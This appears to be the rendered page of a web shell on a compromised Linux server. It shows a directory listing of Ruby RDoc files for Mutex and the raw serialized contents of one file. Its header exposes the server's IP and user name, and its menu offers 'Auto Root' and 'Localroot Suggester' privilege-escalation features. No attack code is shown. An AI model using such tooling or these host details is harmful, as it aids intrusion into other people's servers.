Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.140
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby20 /
share /
ri /
2.0.0 /
system /
Mutex /
Delete
Unzip
Name
Size
Permission
Date
Action
cdesc-Mutex.ri
1.02
KB
-rw-r--r--
2023-07-26 17:38
lock-i.ri
409
B
-rw-r--r--
2023-07-26 17:38
locked%3f-i.ri
357
B
-rw-r--r--
2023-07-26 17:38
new-c.ri
297
B
-rw-r--r--
2023-07-26 17:38
owned%3f-i.ri
422
B
-rw-r--r--
2023-07-26 17:38
sleep-i.ri
635
B
-rw-r--r--
2023-07-26 17:38
synchronize-i.ri
442
B
-rw-r--r--
2023-07-26 17:38
try_lock-i.ri
398
B
-rw-r--r--
2023-07-26 17:38
unlock-i.ri
380
B
-rw-r--r--
2023-07-26 17:38
Save
Rename
U:RDoc::NormalClass[iI" Mutex:ET@I"Object;To:RDoc::Markup::Document:@parts[o;;[ o:RDoc::Markup::Paragraph;[I"RMutex implements a simple semaphore that can be used to coordinate access to ;TI"2shared data from multiple concurrent threads.;To:RDoc::Markup::BlankLine o; ;[I" Example:;T@o:RDoc::Markup::Verbatim;[I"require 'thread' ;TI"semaphore = Mutex.new ;TI" ;TI"a = Thread.new { ;TI" semaphore.synchronize { ;TI"" # access shared resource ;TI" } ;TI"} ;TI" ;TI"b = Thread.new { ;TI" semaphore.synchronize { ;TI"" # access shared resource ;TI" } ;TI"};T:@format0: @fileI" thread.c;T:0@omit_headings_from_table_of_contents_below0; 0;0[ [ [ [[I" class;T[[:public[[I"new;TI" thread.c;T[:protected[ [:private[ [I" instance;T[[;[[I" lock;T@1[I"locked?;T@1[I"owned?;T@1[I" sleep;T@1[I"synchronize;T@1[I" try_lock;T@1[I"unlock;T@1[;[ [;[ [ [U:RDoc::Context::Section[i 0o;;[ ; 0;0[@%@%cRDoc::TopLevel